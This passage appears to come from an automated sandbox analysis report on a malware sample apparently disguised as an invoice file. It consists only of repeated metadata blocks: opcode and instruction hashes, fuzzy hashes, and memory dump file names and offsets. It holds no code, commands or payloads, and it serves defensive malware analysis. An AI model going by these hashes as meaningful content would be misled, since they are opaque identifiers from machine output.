                                                                                  • Instruction ID: 2cac2b4698f0b1d35d72231b87b107cec8b752276b9344696082e230c00c8090
                                                                                  • Opcode Fuzzy Hash: abd12424db4676c46b5132ec327a90f01903b14c6aa9410a054f0c0785c5978c
                                                                                  • Instruction Fuzzy Hash: CB311974B002098BCB24DF64D4849AEBBB3FF88301B548569E546D7385DB39E942CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 66756039ac9a8378457c115834d71ab392fdd32dc338214fee8f43f877f1d8f0
                                                                                  • Instruction ID: cd010a904c9d30534245a884adb5595dc45b27c662a6a91a47fa7b39485d405f
                                                                                  • Opcode Fuzzy Hash: 66756039ac9a8378457c115834d71ab392fdd32dc338214fee8f43f877f1d8f0
                                                                                  • Instruction Fuzzy Hash: 7B41E375E002099FCB04DFA9C984DEEBBF6FF88310B158469E515F7261DB34A941CBA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e7887ba7f3247dc6775258d16d3fe13328f71d4e0dab7f3f3e79f4efed81a39
                                                                                  • Instruction ID: 00188a26476fc132ba0b40900c5b29f8aeccf8a18f6551dac0ede4059f04855a
                                                                                  • Opcode Fuzzy Hash: 8e7887ba7f3247dc6775258d16d3fe13328f71d4e0dab7f3f3e79f4efed81a39
                                                                                  • Instruction Fuzzy Hash: 0531D5357052409FC314EB38D945A1EBFF6EF85604B28C4AEE459CB352CA39EC06C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8adc28b2c3a0f9a5b26d3165bd88d8b889a3f42d9f63eb3b28b7c581a464d4b2
                                                                                  • Instruction ID: 1b17c9465f7d53af3aa1b48275e76fd3ac79ecb94d4258f5ae45192fd1e8a47f
                                                                                  • Opcode Fuzzy Hash: 8adc28b2c3a0f9a5b26d3165bd88d8b889a3f42d9f63eb3b28b7c581a464d4b2
                                                                                  • Instruction Fuzzy Hash: 6431F874600B05CFCB34DF2AC88466ABBF1FF45325B545B28E1969B6A5DB30E946CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f8f8739c6ffe65afa52c7c741377cc9fd45ccaa7f964863f68e56419af494236
                                                                                  • Instruction ID: cab930b8ad6a230d87a2700efb3bef6643e630bbd2690d3bd86ee20df66c28e4
                                                                                  • Opcode Fuzzy Hash: f8f8739c6ffe65afa52c7c741377cc9fd45ccaa7f964863f68e56419af494236
                                                                                  • Instruction Fuzzy Hash: B6316B74A002059FCB24DF68C484A6EBBB3FF88304B698569E146D7355DF35E842CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14967d3105b2c179b65a65422a1b776fc78c5cdd224b8c216ce8066b000dd9ec
                                                                                  • Instruction ID: 7041ea9e1a77c4de151a4f97b6d7afc36bbdc8add725bb725170592b4a4ea9fa
                                                                                  • Opcode Fuzzy Hash: 14967d3105b2c179b65a65422a1b776fc78c5cdd224b8c216ce8066b000dd9ec
                                                                                  • Instruction Fuzzy Hash: 30316D39B102048FCB54DF59C5946AEBBF2EF49251B1884AEE446EB390DB31DD018B54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89c38fdf075b861c3c989f3cb55df2bff155ad672ac7aec4caae41637fb93347
                                                                                  • Instruction ID: 2136acefb09e9c3c73d04c879abec25bde70c3965f328c8d63197da869a518d8
                                                                                  • Opcode Fuzzy Hash: 89c38fdf075b861c3c989f3cb55df2bff155ad672ac7aec4caae41637fb93347
                                                                                  • Instruction Fuzzy Hash: 923135346107458FC770DF2AC84466AB7F2EF89350B144A2DE4A6DB7A1DB30E946CF84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b1d5c12ea5a38a403c101855b1155ddfcce66bcd4239d372bba8c94eb155e527
                                                                                  • Instruction ID: f397f700a0c980323cac68a9d4b2e704a3cd10c061e21eea556f006185ba4509
                                                                                  • Opcode Fuzzy Hash: b1d5c12ea5a38a403c101855b1155ddfcce66bcd4239d372bba8c94eb155e527
                                                                                  • Instruction Fuzzy Hash: 4B310874600B05CFC734DF2AC84466ABBF1FF49315B105A28E1969B6A5DB30E94ACF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c702d36d0a3e73067a6bb6aa0a6bcb5cad2c04ac589a31de8f1da15570c01548
                                                                                  • Instruction ID: cdf0f242f8e0f830bdec042740fa59a9536023d31ab1f8ea79e19329f65b8816
                                                                                  • Opcode Fuzzy Hash: c702d36d0a3e73067a6bb6aa0a6bcb5cad2c04ac589a31de8f1da15570c01548
                                                                                  • Instruction Fuzzy Hash: 7121F3383102421BC755E67A9A9262E7EDBFBC626075881AFD015CF358EF31EC0B8794
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 881b9e887b194b90b6dbc169ced9e33739346f24ae989de0af6b74ab1e443b56
                                                                                  • Instruction ID: 8396c5bc34ac5d87008cd3999fefdf41fea6c5e08371e72769bb94a15c7ea483
                                                                                  • Opcode Fuzzy Hash: 881b9e887b194b90b6dbc169ced9e33739346f24ae989de0af6b74ab1e443b56
                                                                                  • Instruction Fuzzy Hash: 293138746006418FC770DF2AC88466BB7F1EF89320B144A6DD4A6DB7A5D730E906CF85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 154e7a5be529a539b3ec6bbdd6e2d55f2be22570861bdb808c6278c5b1e2e308
                                                                                  • Instruction ID: 374355881b6b74542d8c2aad495ee04182a2d360960c96feaa5a08d4e88de6f7
                                                                                  • Opcode Fuzzy Hash: 154e7a5be529a539b3ec6bbdd6e2d55f2be22570861bdb808c6278c5b1e2e308
                                                                                  • Instruction Fuzzy Hash: 86318C7560410AAFDB24CF58E884FAE3BFAEB88300F104265ED06DB695D775AC40CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b62f5c48ac25dcc02a6bf0f033c57d1655ae4dffc9dc790cb70ddf0252515f8b
                                                                                  • Instruction ID: 49b441fdff66cd1662755d7d4c378f13696f383e8d950f9d9f285a3480fbd73a
                                                                                  • Opcode Fuzzy Hash: b62f5c48ac25dcc02a6bf0f033c57d1655ae4dffc9dc790cb70ddf0252515f8b
                                                                                  • Instruction Fuzzy Hash: 6C2180707003018BDF21DB68C9C0A6EFFF6AF89254B04846AD985CB759EF74DD0587A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a276247852139e31bc5312db45a72843b8268e5e5458fc1d9f076f9a4bb5170
                                                                                  • Instruction ID: aaa20a892aefb6b237609a106043ca79e63f2662e6f8e563e2a4c0e1d7c832ae
                                                                                  • Opcode Fuzzy Hash: 1a276247852139e31bc5312db45a72843b8268e5e5458fc1d9f076f9a4bb5170
                                                                                  • Instruction Fuzzy Hash: 9021C1383102425B8755E67AAA9162E6EDBFBC636035885AFD015CF358EF31EC0B87D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58cb4505a58c75534ef1601bf50809dff94baaa42ec8545b680e4bbdb432eb5f
                                                                                  • Instruction ID: 4b547320aaa3d20c4ef80c4e80e5989ea26794bc70cf6d66841b30ad97dd748a
                                                                                  • Opcode Fuzzy Hash: 58cb4505a58c75534ef1601bf50809dff94baaa42ec8545b680e4bbdb432eb5f
                                                                                  • Instruction Fuzzy Hash: E3215E34A107459FD774DF29D94966BBBF6AF48310B040A2ED456CB394DB30E905CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db4e19f1ba4d74fe45c29c4045453f77f6045eb8e1c0c367afc750cbabb23fa2
                                                                                  • Instruction ID: 5391352b8cf8da8cd5928960b434c35dbb6ec9874c7552e501e7e707f8d05f55
                                                                                  • Opcode Fuzzy Hash: db4e19f1ba4d74fe45c29c4045453f77f6045eb8e1c0c367afc750cbabb23fa2
                                                                                  • Instruction Fuzzy Hash: 2D314D31A00208EFCB14DFA5D998AEEBFB6FF48310F149129F506A7244DF30A851CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3bfbad078a77fad8b8d991b621872930eaad905e279203af774c476602666cc9
                                                                                  • Instruction ID: 730441606bf3e7036e7b3a46df3ba4471cee153ac671492dbca231456766ef7a
                                                                                  • Opcode Fuzzy Hash: 3bfbad078a77fad8b8d991b621872930eaad905e279203af774c476602666cc9
                                                                                  • Instruction Fuzzy Hash: 1021D475700510ABD728AB65DC59B6EB7A6FFC8351F108124F95A837C8DF347851CB84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c4a01858257ad89e68af18390df689a2c452f18f4c9bfa0795f43a713cff972
                                                                                  • Instruction ID: 611ce9099e58beb732be49c4f813d098d4663591de833a3bc1cfae0810104ffd
                                                                                  • Opcode Fuzzy Hash: 1c4a01858257ad89e68af18390df689a2c452f18f4c9bfa0795f43a713cff972
                                                                                  • Instruction Fuzzy Hash: C2312D39910219CFCB25DF64D945A9CBBB2FF89314F008599E6096B324DB31AD85DF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 782eb67534138bf26e3846e29f56964e77d6586e87c0cd2219480dceaaa2165e
                                                                                  • Instruction ID: 5c8a3973d07ada0dd2b3933dbadcb163df1ed4b08aa375bc77d102ccc604871a
                                                                                  • Opcode Fuzzy Hash: 782eb67534138bf26e3846e29f56964e77d6586e87c0cd2219480dceaaa2165e
                                                                                  • Instruction Fuzzy Hash: 44210A357002039FCB10DBB9E98055E7BE6FF85220744866AE805DF368EF79ED048B94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f89106a27d042e81c293275570f8463768e6b17fa1690cce88bd72e3f553daa4
                                                                                  • Instruction ID: 38731dab48cc16c349b9a849ef436d554697003a116639b408a2303a3d6bf48b
                                                                                  • Opcode Fuzzy Hash: f89106a27d042e81c293275570f8463768e6b17fa1690cce88bd72e3f553daa4
                                                                                  • Instruction Fuzzy Hash: 2321A1753103018FC705DB69E88685ABFB6EFC922036589BAE9899B325DF71DC048B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c40f8da8648ca90503a9f71824ce5cbf5f1411f74c0ce3a37c87e4ed6a372aae
                                                                                  • Instruction ID: 5f283d798895cbb90cdcd42dfbc3926cd0c9c079c9392a2a292ae0347071d023
                                                                                  • Opcode Fuzzy Hash: c40f8da8648ca90503a9f71824ce5cbf5f1411f74c0ce3a37c87e4ed6a372aae
                                                                                  • Instruction Fuzzy Hash: 9121F475E002188FDB59CFAAC8446EEBBF2EF89310F04C06AD414AB264DB355946CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db3c6aacecae094bdf70e601fbdbdf57d9eded07faa0258eb2bff991c92d3a6c
                                                                                  • Instruction ID: f55bc403c40da797a32d7a2f2ab22c78ebb591bed11decb805ef970343f98ce2
                                                                                  • Opcode Fuzzy Hash: db3c6aacecae094bdf70e601fbdbdf57d9eded07faa0258eb2bff991c92d3a6c
                                                                                  • Instruction Fuzzy Hash: 5E217F34600146CBCF28DF2AD9C459FBB75EF49324B0442AAD8159F29ADB31E851CFE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33a59efbcccdc785c238245962120733986faa962ee8fe5d17683eb54e452643
                                                                                  • Instruction ID: 326a3625c66b993e100cc2178e9b56e27371aff6dbdd3ac4bcb4b4f7fda6a15f
                                                                                  • Opcode Fuzzy Hash: 33a59efbcccdc785c238245962120733986faa962ee8fe5d17683eb54e452643
                                                                                  • Instruction Fuzzy Hash: 36210571A042499FCB01DF69D84489ABFF5FF85220B1980AAE548DB222DB35DD05C7A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6fd23571c53d910975bfe817000a48e331562ba4d116e6878ee57d656c66eb76
                                                                                  • Instruction ID: c0733da57ec6a162568d197b7f6407e402d58a00bedf20e55a904fe21d17f933
                                                                                  • Opcode Fuzzy Hash: 6fd23571c53d910975bfe817000a48e331562ba4d116e6878ee57d656c66eb76
                                                                                  • Instruction Fuzzy Hash: A421AE75E0030A8FCB01DFB4D8446DEBBB5FF89310B10C66AE559A7250EF34AA49CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e886f2ccec3e8bafc62cfd30564dda6a145fa69432e648ba08708e40f4d813af
                                                                                  • Instruction ID: 25e2c6aff78f9085707a5cac8108e68315ce255878fdce8e264ae306653acf5f
                                                                                  • Opcode Fuzzy Hash: e886f2ccec3e8bafc62cfd30564dda6a145fa69432e648ba08708e40f4d813af
                                                                                  • Instruction Fuzzy Hash: FD212C34200B458FC735DF66D95459AB7F1EF48320B044A6DD4629B7A4DB31E94ACF84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb27872901fcbedebf5a9be04c8a976bf09542517c3a556ecc543e80c37a963d
                                                                                  • Instruction ID: 4d1b8b2f30a7beeead82f56876ef16db74d50cf1b678cee6e9862fa1c85e958b
                                                                                  • Opcode Fuzzy Hash: cb27872901fcbedebf5a9be04c8a976bf09542517c3a556ecc543e80c37a963d
                                                                                  • Instruction Fuzzy Hash: F511D0B12003069BC700DB65D985A6EBFE6FB85320B44853AE519DB318EF74AD098BD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8ee17e3a411cfe1aafe268c7047ecda756059e0980f05760b61b2e6ae553cbb4
                                                                                  • Instruction ID: fb11b52861540bbf4f699e9070e4da7e023e335532dbbf11fe294aec85ede037
                                                                                  • Opcode Fuzzy Hash: 8ee17e3a411cfe1aafe268c7047ecda756059e0980f05760b61b2e6ae553cbb4
                                                                                  • Instruction Fuzzy Hash: A4219335A003069FCB05DB69D886AAEBBF5FF85310B4485A6E149DB359EB30AD058BD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a060af7d38f330f84c3e1389d829dcd491a2fefb01649076168736bb897a9079
                                                                                  • Instruction ID: ed1e04c70668a9767f9a3eef0440ef5fbae1cdd9b10fb49a72ed37a609342e0e
                                                                                  • Opcode Fuzzy Hash: a060af7d38f330f84c3e1389d829dcd491a2fefb01649076168736bb897a9079
                                                                                  • Instruction Fuzzy Hash: E311E936B102288BCF608A58C9045AEBBB6DFC8751B09807EDA0AEB311D731CC16CBD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af3fdbe2d30e564614e831a96cb1de42a69a14472110b927241563ba32b89aff
                                                                                  • Instruction ID: 4dfe79a27f75fe7e46b5939a88ea8b8a11b8eecb707d179dd44ea15fc9d5461e
                                                                                  • Opcode Fuzzy Hash: af3fdbe2d30e564614e831a96cb1de42a69a14472110b927241563ba32b89aff
                                                                                  • Instruction Fuzzy Hash: 2111E1357001048F8B08DB29D5855AEBFF6EFC932031981AEE446DB359EF30EC068B80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c056413e9ed62541ea317bdc7bf9017fcafeba2f717e525b71b0e7b44e20a1ec
                                                                                  • Instruction ID: 1c4b4493ccd57b6122153915a4a672ebbbcdb784ef1c8aee0399de771100ca6e
                                                                                  • Opcode Fuzzy Hash: c056413e9ed62541ea317bdc7bf9017fcafeba2f717e525b71b0e7b44e20a1ec
                                                                                  • Instruction Fuzzy Hash: A811E936A142588BCB908A58C94456EBBB6DF89310F09807EDA46DB322D635DC16CB84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bce67dc19760046f10761d4f8df7f5ad9d71eff908dc10d2e07b1f71ffd13cea
                                                                                  • Instruction ID: 6dbed298e0fe7078125ff1261e28a5c5abded5b569bb8c063f1c19756aa85e1a
                                                                                  • Opcode Fuzzy Hash: bce67dc19760046f10761d4f8df7f5ad9d71eff908dc10d2e07b1f71ffd13cea
                                                                                  • Instruction Fuzzy Hash: C511AF357002058B8B08DB68D68559EBFF6EFC822031985AEE446DB359EF30ED068B80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e6a3d0f957d10128ab09a9bc13c4d57398857c5e66d2537d9bbfb4b80244ac03
                                                                                  • Instruction ID: 38c1c88a29f1163d5d6bbb14c4e4c03bb0548de24e02655f68a5d6b8eff477fd
                                                                                  • Opcode Fuzzy Hash: e6a3d0f957d10128ab09a9bc13c4d57398857c5e66d2537d9bbfb4b80244ac03
                                                                                  • Instruction Fuzzy Hash: 181108757002139B8B04A7B9D89451E7BE6EF85220344866AE905DF368EF74EC048794
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2d086117b34bd2fcc94b1f036df5e83c813bf98e4a6e82b42f470ab36b23650
                                                                                  • Instruction ID: cb92b1a6f31ddba0ec53c6bdbb1d5e4cbd9a2e35c93abaf0c2b28465560a19af
                                                                                  • Opcode Fuzzy Hash: e2d086117b34bd2fcc94b1f036df5e83c813bf98e4a6e82b42f470ab36b23650
                                                                                  • Instruction Fuzzy Hash: CB11843170020A9FCB00DB69D8869AEBBF5FF85310B408565E159DB318EF70AD058BD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b70a33ee4506516530ede4934cd78854c5dc909536ed9715a71485e32c1a9429
                                                                                  • Instruction ID: 90edeca5929f14159d1e8ef066e8fadce00d0fe264f6acc986266ac2eaaef8d4
                                                                                  • Opcode Fuzzy Hash: b70a33ee4506516530ede4934cd78854c5dc909536ed9715a71485e32c1a9429
                                                                                  • Instruction Fuzzy Hash: 8901C07B3000009B8318DA69F480D6EB3AAFBD9274314407BE509C7314CE3ADC07C768
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a96e5db1094dd0eb59a874de65bd035ff1bb1d91a081907607272d177c1a1276
